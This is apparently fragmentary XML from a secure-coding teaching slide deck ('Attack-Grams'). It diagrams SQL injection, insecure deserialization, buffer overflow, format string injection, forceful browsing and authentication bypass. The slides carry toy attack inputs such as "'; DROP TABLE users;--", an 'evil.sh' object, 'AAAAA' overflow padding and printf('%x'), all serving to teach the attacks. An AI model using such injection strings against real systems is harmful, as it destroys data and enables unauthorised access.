            <a:off x="1854253" y="3928583"/>
            <a:ext cx="3360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user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: jsmith</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'; DROP TABLE users;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--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9CB740-A901-5543-BDCD-476BE2ED9A79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1266384" y="1582702"/>
            <a:ext cx="98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8BE125-7A9C-A340-88FE-28FD17B9536A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5214275" y="1701099"/>
            <a:ext cx="212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SQL Database Server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E3654963-812C-A340-828A-16DE80D8D158}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2379524" y="2624020"/>
            <a:ext cx="3393169" cy="12700"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:alpha val="5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n 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{572399D8-748F-AC45-AD76-112D9DFA216B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5772693" y="2130846"/>
            <a:ext cx="1135507" cy="1196945"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="18000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln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A4995991-3603-3845-9807-F79F8C4F854B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2379524" y="2949600"/>
            <a:ext cx="3393169" cy="21046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3713B9F-D68F-BB43-B597-5CDB227C7B17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3360898" y="2729318"/>
            <a:ext cx="15440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TABLE users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100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0B9BF7-919B-5E48-BD95-2254B6030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96" t="2810" r="2087" b="69375"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6084041" y="2427959"/>
            <a:ext cx="516151" cy="6454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B041B1-2741-6547-92D0-CA91B39733A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6003305" y="3002990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0C0E-6A15-D142-AC78-44D43BDF8531}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6146171" y="2644969"/>
            <a:ext cx="356991" cy="325677"/>
            <a:chOff x="7809979" y="3941589"/>
            <a:chExt cx="356991" cy="32567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638C96-E54B-B541-AB6D-D146A8719848}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7809979" y="3941589"/>
              <a:ext cx="356991" cy="3256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B0C55E6-7631-FB4E-82DA-47AB39B69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9979" y="3941589"/>
              <a:ext cx="356991" cy="3256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8138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A49D4B-72A5-C448-9A50-999EF04CF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654" y="2091058"/>
            <a:ext cx="1577870" cy="1251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9771D5-4396-A64B-92A9-9813AD3E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996" y="697816"/>
            <a:ext cx="1213852" cy="1139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11579E-0513-5E45-BA41-11B740E99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720" y="692668"/>
            <a:ext cx="1694622" cy="1149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7691D6-A837-D849-9EFD-E8AD3DEBD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177" y="692668"/>
            <a:ext cx="1654059" cy="1183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BB8CBD-FDB9-BC4D-9B40-6F9B5ECC7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403" y="698918"/>
            <a:ext cx="1909527" cy="1322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CFF93C-2CE1-2E47-9668-F625EB17E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6098" y="696538"/>
            <a:ext cx="1807025" cy="1314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C5B7A-231D-6843-B557-903B0CEE8F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2451" y="2091058"/>
            <a:ext cx="2251543" cy="1352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0B4D8D-467F-E34C-B426-02291DE716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6153" y="2091058"/>
            <a:ext cx="1747845" cy="1247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40A52E-4D55-5B46-8058-59F0CE24CF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8752" y="2125649"/>
            <a:ext cx="1583787" cy="14695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A75357-2306-CE4F-B514-FE84A1C2B3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0434" y="2091058"/>
            <a:ext cx="1176640" cy="10902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9D7D0F-54DA-D74A-9751-7E095168B1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6554" y="3556362"/>
            <a:ext cx="1390494" cy="1350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6DD429-D6C6-524E-A032-C15E5598A1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3049" y="3579378"/>
            <a:ext cx="1491249" cy="12553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8CE3D7-786A-2C4F-8C9B-FEA833786A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0456" y="3576739"/>
            <a:ext cx="1379382" cy="13100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41A5E8-8079-E741-A3FE-8FFD1D6DC4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43548" y="3593467"/>
            <a:ext cx="1390237" cy="13292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D7B54D-5257-D24C-BC28-38A3F231D6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61664" y="3600766"/>
            <a:ext cx="1189789" cy="13219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BAA1D4-9F3C-6343-AF0D-BE65CC6F44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76098" y="5137363"/>
            <a:ext cx="1411362" cy="12338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187F77-DA8A-234E-89B7-0DE666CA55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21050" y="5071794"/>
            <a:ext cx="1440450" cy="117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65954D-4CBF-2440-825D-EC75C2075C8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9017" y="5084428"/>
            <a:ext cx="1089332" cy="8970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254DC8D-5982-8F4A-9300-20F7620616F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67951" y="5075513"/>
            <a:ext cx="1515417" cy="87128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B8F6FF6-7B85-274E-8A3B-CF9AEE5E6727}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-1"/>
            <a:ext cx="12192000" cy="4521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Secure Coding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attack-Grams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6C753D-6565-6345-8176-5124603034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42995" y="5071794"/>
            <a:ext cx="1306010" cy="12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19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8021-F5A3-7A4B-A1E4-91669ECE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46" y="284146"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Insecure Deserialization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68B87-6FBE-DE42-A6BA-834C1B239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2723746" y="1567361"/>
            <a:ext cx="1371683" cy="166642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38FC0AF-91A6-3C40-877E-CCEF69A30155}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2037493" y="4613935"/>
            <a:ext cx="1050542" cy="1279484"/>
            <a:chOff x="1267225" y="4514012"/>
            <a:chExt cx="1050542" cy="127948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946F9A6-DF3D-E840-93F6-FB4FE5FF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77601" y="4514012"/>
              <a:ext cx="952500" cy="95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AE18CF-923F-B14E-8685-05A6FEB55251}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1267225" y="5424164"/>
              <a:ext cx="105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</p:grp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A69D79DD-5599-A14B-B897-D12006D7ADBD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rot="5400000" flipH="1" flipV="1">
            <a:off x="2276779" y="3481127"/>
            <a:ext cx="1380148" cy="885469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69CB740-A901-5543-BDCD-476BE2ED9A79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2806922" y="1240377"/>
            <a:ext cx="1205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Book Store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DA788ECB-1243-7D45-8C39-4DDBC6432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088035" y="2468462"/>
            <a:ext cx="481538" cy="49464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E64D24A-A263-2B47-9840-83D81685C37D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9462347" y="2971520"/>
            <a:ext cx="15656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ourier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;_ evil.sh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F0923061-8275-6746-BBFC-83A9C2E1D3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506493" y="3782554"/>
            <a:ext cx="574890" cy="5748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21DF1C7-EBA2-D743-BCF8-4F3D3CC427E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3902535" y="4389593"/>
            <a:ext cx="1467068" cy="1503826"/>
            <a:chOff x="1345136" y="3444526"/>
            <a:chExt cx="1467068" cy="1503826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122F76F-F9BA-5441-A3B1-F0B9F3D9C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1345136" y="3444526"/>
              <a:ext cx="952500" cy="9525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7BBAFDB9-FAD4-0A43-AF69-9B02F9976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1680575" y="3627856"/>
              <a:ext cx="952500" cy="952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433081-5A63-BC4B-9B6D-9651E5A49B4B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1345136" y="4579020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Regular Users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25C85E3-28AC-224D-A834-9B429D7C2297}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1380195" y="4389536"/>
            <a:ext cx="115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Command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Object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3E1A5538-F591-B747-B811-49D8FA8FB749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="25" idx="0"/>
            <a:endCxn id="4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="3316284" y="3327091"/>
            <a:ext cx="1155806" cy="969197"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="65000"/>
                <a:lumOff val="35000"/>
                <a:alpha val="5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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E76D4CE3-4BEB-D240-BCC9-392C35D467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754048" y="3549830"/>
            <a:ext cx="872851" cy="8728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27D80FF-70FD-DF41-943A-5F146FAE669C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4946269" y="4323189"/>
            <a:ext cx="803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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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641070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8021-F5A3-7A4B-A1E4-91669ECE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90" y="417074"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer Overflow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68B87-6FBE-DE42-A6BA-834C1B239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3672631" y="1894246"/>
            <a:ext cx="2026712" cy="246220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38FC0AF-91A6-3C40-877E-CCEF69A30155}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1328982" y="2649099"/>
            <a:ext cx="1050542" cy="1279484"/>
            <a:chOff x="1267225" y="4514012"/>
            <a:chExt cx="1050542" cy="127948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946F9A6-DF3D-E840-93F6-FB4FE5FF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77601" y="4514012"/>
              <a:ext cx="952500" cy="95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AE18CF-923F-B14E-8685-05A6FEB55251}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1267225" y="5424164"/>
              <a:ext cx="105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</p:grp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A69D79DD-5599-A14B-B897-D12006D7ADBD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2291858" y="3125349"/>
            <a:ext cx="1380773" cy="12700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52B0A7-4E83-6845-AEB8-5AD5259F7D29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2217508" y="2702558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  <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AAAAA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9CB740-A901-5543-BDCD-476BE2ED9A79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4091002" y="1530769"/>
            <a:ext cx="98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Program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E8417B-6E8F-C948-869E-EB06451FECDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4095178" y="2500933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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AAAA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>i!\0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="686093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14DE-F880-8F46-8A33-20B48514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770" y="572571"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Format String Injection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BEDEA-D3D7-7649-9B73-CB3D6A2D7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2962" r="2089" b="37637"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2762244" y="1921995"/>
            <a:ext cx="2026712" cy="246220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FB2EBA0-4D4B-7D4F-82C1-633447B85343}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1061187" y="2640368"/>
            <a:ext cx="1050542" cy="1279484"/>
            <a:chOff x="1267225" y="4514012"/>
            <a:chExt cx="1050542" cy="127948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3D8AAA1-B068-2F40-B76F-2CFF92F92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77601" y="4514012"/>
              <a:ext cx="952500" cy="95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AEA66F-F158-464B-9277-24D46AC0562A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1267225" y="5424164"/>
              <a:ext cx="105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</p:grp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CB28343D-B571-C541-B65B-F510DBCE06BB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24063" y="3111297"/>
            <a:ext cx="967670" cy="5321"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="C0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A3458D-13E5-994D-9E89-E52D9F647BBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2220704" y="2760241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%x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ED6C8-88B1-A34F-88F1-4993933EC112}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3296140" y="1640089"/>
            <a:ext cx="98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1E2566-DEF8-6C4D-8CB2-C5BECB081633}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3122503" y="2910778"/>
            <a:ext cx="13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secret = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>123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60180200-4B58-C44C-857D-C52BCA6E31C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4647328" y="3098597"/>
            <a:ext cx="1086658" cy="12700"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:alpha val="5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4438A7-C003-B64F-9779-C97132352804}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4555281" y="2726112"/>
            <a:ext cx="12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printf("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>")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9A75FA-7A50-A54D-B0B9-579DCD8291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l="80810" t="3839" r="2089" b="67679"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5639766" y="2492785"/>
            <a:ext cx="1074974" cy="12651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2E332A7-C84C-3C4E-83AF-5E3B8B8CE83B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5733986" y="2092744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 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759A5F-2D0F-094D-98EA-8D679F299075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5895087" y="289484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123</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="370034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90" y="704966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Authentication Bypass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B19F13-0915-7446-9028-EC431BE4CA7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1398878" y="1408656"/>
            <a:ext cx="3480813" cy="3564836"/>
            <a:chOff x="1398878" y="1408656"/>
            <a:chExt cx="3480813" cy="35648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721913-DCA6-2749-BF68-9D3623614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810" t="61896" r="2089" b="6904"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3391047" y="1408656"/>
              <a:ext cx="718457" cy="9262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C86D53-E484-A94C-B33B-6CAD9A805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810" t="32962" r="2089" b="37637"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1507314" y="1431834"/>
              <a:ext cx="718457" cy="8728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8D73A4-34F7-BB4F-A702-D68B3A75FFA4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1507314" y="2237585"/>
              <a:ext cx="732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/login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39C724-D387-0645-AD03-15F0B8D33AA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3249244" y="2226979"/>
              <a:ext cx="1173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/restricted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7DB8B7E-0945-BA4E-92AC-0C5EE259C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363768" y="3613109"/>
              <a:ext cx="952500" cy="95250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143C41B-0369-DF42-8D23-CD96297C5EB6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1398878" y="3469666"/>
              <a:ext cx="1467068" cy="1503826"/>
              <a:chOff x="1345136" y="3444526"/>
              <a:chExt cx="1467068" cy="1503826"/>
            </a:xfrm>
          </p:grpSpPr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9E9B8A2A-1A9D-7742-A5FF-32C355FA5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1345136" y="3444526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93270576-9AC6-5147-9955-7029A4B44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1680575" y="3627856"/>
                <a:ext cx="952500" cy="9525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C41E3C-7C7A-034A-8B7E-41549B3D4C3C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1345136" y="457902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Regular Users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BBC84B-9A44-AD43-915F-EA2939C046D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3384278" y="4551251"/>
              <a:ext cx="960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E71BF70E-D78E-A54F-90D0-4E93C36FAC3D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="18" idx="0"/>
              <a:endCxn id="8" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipV="1">
              <a:off x="1443071" y="3037608"/>
              <a:ext cx="862749" cy="1367"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3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6B146178-72F2-974B-BB4F-8808455E4F27}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="8" idx="2"/>
              <a:endCxn id="5" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="2264842" y="1480713"/>
              <a:ext cx="735123" cy="1517286"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector4">
              <a:avLst>
                <a:gd name="adj1" fmla="val -31097"/>
                <a:gd name="adj2" fmla="val 62076"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="444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56AD4CEB-26B0-0746-B537-EFE45C343400}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="17" idx="0"/>
              <a:endCxn id="9" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipV="1">
              <a:off x="3329646" y="3102737"/>
              <a:ext cx="1016798" cy="3946"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3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D7DDE3-48F9-A349-B146-4C9BC97FFCC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3836072" y="3032514"/>
              <a:ext cx="10436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Forceful </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Browsing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98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FADA-9348-7E49-984A-11398F0D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Reliance on Untrusted Inputs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9ABB64-6D16-2349-BCE0-32B733F95B99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2796000" y="1515126"/>
            <a:ext cx="2451158" cy="3511927"/>
            <a:chOff x="1330454" y="1615335"/>
            <a:chExt cx="2451158" cy="35119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A9AE37-2145-9C4C-BC83-67F427628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810" t="61896" r="2089" b="6904"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1468301" y="1615335"/>
              <a:ext cx="718457" cy="92627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13674-7775-EC40-9FE8-8DCFCB69DC18}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1330454" y="2488172"/>
              <a:ext cx="1173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/restricted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5AB5670-6DBD-6243-9168-816AC1756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441022" y="3819788"/>
              <a:ext cx="952500" cy="95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484BFD-7ED3-4642-8443-E772034B8333}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1461532" y="4757930"/>
              <a:ext cx="960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Attacker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6C52721D-8D8E-444A-A815-8393BF6D18AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="6" idx="0"/>
              <a:endCxn id="5" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="1436135" y="3338641"/>
              <a:ext cx="962284" cy="10"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3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Callout 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E74D061-2B72-CF43-87C6-20F911F1E052}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2144228" y="3215593"/>
              <a:ext cx="1482058" cy="751042"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeEllipseCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -45278"/>
                <a:gd name="adj2" fmla="val 57632"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:alpha val="9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I'm admin ;)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Oval Callout 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2086B177-20BA-E248-AEC2-DA3E21E8DA39}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2299554" y="1615335"/>
              <a:ext cx="1482058" cy="751042"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeEllipseCallout">
              <a:avLst>
